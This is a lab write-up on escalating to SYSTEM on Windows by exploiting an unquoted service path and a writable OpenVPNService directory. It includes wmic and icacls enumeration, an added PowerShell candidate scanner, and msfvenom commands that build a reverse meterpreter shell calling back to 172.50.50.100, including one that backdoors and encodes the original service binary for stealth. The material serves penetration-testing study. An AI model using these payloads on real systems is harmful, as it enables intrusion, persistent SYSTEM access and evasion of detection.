Windows Privilege Escalation (Unquoted Service Paths)
One way to elevate privileges on a Windows host is to look for services whose binary path is unquoted and contains blank spaces. Because Windows cannot tell where the executable name ends, it tries several candidate paths in turn before reaching the real binary. If we have a shell as a user who can create or modify files in a directory holding one of those candidates, we can plant our own executable there and have the service run it with the service's privileges.
To start this lab, I was given a bind shell to a Windows machine as a low privileged user.
Before running the exploit, I set AutoRunScript migrate -f on the handler so that the shell would migrate to a different process once it had been established. This is useful because it stops the shell being lost if a user closes the process it was spawned in.
As can be seen from the above screenshot, the initial shell was for a low-privileged user. My mission was to elevate privileges to SYSTEM by finding and exploiting unquoted service paths.
I started by opening an interactive shell so that I could use wmic to list candidate services:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
This keeps auto-start services, drops anything under C:\Windows, and drops any path that is already quoted. It does not filter on spaces itself, so the remaining paths still have to be read to see which ones contain a blank.
This command found a service called OpenVPNService.
Next, I queried this service further using sc qc OpenVPNService and discovered that it started as LocalSystem (SERVICE_START_NAME), which was a good find: whatever binary the service launches runs as SYSTEM.
Now, looking at the unquoted service path, we can see that because it contains a blank space, Windows will try each possible split of the path in turn, appending .exe, until one exists. My job was therefore to find a directory somewhere along that search order in which I could create or modify files.
For C:\Program Files\OpenVPN\bin\openvpnserv.exe the search order goes like this:
C:\Program.exe
C:\Program Files\OpenVPN\bin\openvpnserv.exe
Dropping C:\Program.exe would need write access to the root of C:\, which a standard user does not have by default, so the next place to look was the directory holding the real binary.
I first checked the \OpenVPN\bin directory using icacls and found that els_user did indeed have Modify (M) rights on it:
icacls "C:\Program Files\OpenVPN\bin"
Note that this is the last entry in the search order, the directory of the real binary, so what follows is really replacing the service executable through a weak directory ACL rather than hijacking an earlier candidate. The result is the same: whatever sits at that path runs as SYSTEM when the service starts.
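The following PowerShell is an added example, not part of the original lab write-up. It automates the three steps above: list auto-start services with an unquoted path containing a space, expand each path into the candidates Windows tries in order, and test whether the current user can write to the directory of each candidate. Service names, paths and accounts are whatever the target returns; nothing in it is specific to OpenVPNService.

```powershell
# Added example (not from the original write-up). Enumerates auto-start services
# whose binary path is unquoted and contains a space, expands the search order
# Windows uses for such a path, and checks which candidate directories the
# current user can write to. Run from the low-privileged shell on the target.

function Get-UnquotedPathCandidates {
    # Turn "C:\Program Files\OpenVPN\bin\openvpnserv.exe" into the ordered list
    # Windows will try: C:\Program.exe, then the full path. For a path with
    # several spaces every intermediate split is generated as well.
    param([Parameter(Mandatory)][string]$PathName)

    # Strip any arguments after the executable: keep everything up to ".exe".
    $exe = $PathName
    $idx = $exe.ToLower().IndexOf('.exe')
    if ($idx -ge 0) { $exe = $exe.Substring(0, $idx + 4) }

    $candidates = @()
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    $candidates += $exe
    return $candidates
}

function Test-DirectoryWritable {
    # Try to create and delete a random file; this is a real write to the target,
    # so use icacls instead if you need to stay read-only.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $probe = Join-Path $Directory ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

Get-CimInstance Win32_Service |
    Where-Object {
        $_.StartMode -eq 'Auto' -and
        $_.PathName -and
        $_.PathName -notmatch '^"' -and                              # already quoted
        $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and           # skip C:\Windows
        ($_.PathName -replace '(?i)\.exe.*$', '.exe') -match ' '     # exe part has a space
    } |
    ForEach-Object {
        $svc = $_
        foreach ($candidate in Get-UnquotedPathCandidates $svc.PathName) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Candidate = $candidate
                Writable  = Test-DirectoryWritable (Split-Path -Parent $candidate)
            }
        }
    } | Format-Table -AutoSize
```

A row with Writable = True and RunsAs = LocalSystem is the situation described in this lab. If the writable candidate is an earlier entry (for example C:\Program.exe), a payload placed there is picked up before the real binary; if, as here, it is the directory of the real binary itself, the original executable has to be replaced or backdoored.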
I next looked in the targeted directory to see if I could find the original binary.
I now needed to replace this original binary with a malicious binary that would open a reverse meterpreter shell when it was executed by the service OpenVPNService. The malicious binary would need to sit in the same directory and have the same name as the original one, so I also needed to rename or remove the original. I renamed it to openvpnserv.exe.bak.
I then used msfvenom to craft a reverse meterpreter shell named openvpnserv.exe and uploaded it into the target directory through the original meterpreter shell. The upload succeeded because I could modify the contents of the directory. The command used to craft the payload was:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=4460 --platform Windows -f exe > openvpnserv.exe
Now, when OpenVPNService is restarted, it should execute my malicious binary instead of the original one. One problem is that the reverse shell would be opened but then immediately close: a plain msfvenom executable never registers with the Service Control Manager, so once the start timeout expires (30 seconds by default) the SCM reports that the service did not respond (error 1053) and kills the process, taking the shell with it. I first solved this by having the handler migrate the new session into another process as soon as it connected, using set AutoRunScript migrate -f (migrating into a long-lived process such as explorer.exe).
Next, with the handler already running as a background job, I went back into the original shell and tried to stop OpenVPNService so I could then restart it. This did not work: sc stop OpenVPNService was refused, because a low-privileged account normally has no SERVICE_STOP right on a service it did not install (the service's DACL can be inspected with sc sdshow OpenVPNService).
I therefore rebooted the machine by using the reboot command from inside the meterpreter shell. This worked, though it was not exactly stealthy!
All I then needed to do was wait for OpenVPNService to start on boot and execute my malicious binary as SYSTEM.
I also learnt a more stealthy way to get this to work. Instead of renaming or deleting the original binary and replacing it with a malicious one, I crafted a reverse meterpreter shell with msfvenom, encoded it, and injected it into the original binary. In this way the original service still works, but my reverse meterpreter shell is also started. Because the backdoored binary still registers with the Service Control Manager like the original did, the process is not killed, so there is no need to migrate. This is also stealthier because a user will not notice that the service has stopped. To do this, I first downloaded the original binary and then ran:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=4460 --platform Windows -f exe -e x86/shikata_ga_nai -i 15 -k -x openvpnserv.exe.bak > openvpnserv.exe
Here -x uses the saved original binary as the template and -k keeps the template's own behaviour by running the payload in a separate thread; the encoder and iteration count only affect how the payload looks on disk, not whether it works.
This way also worked!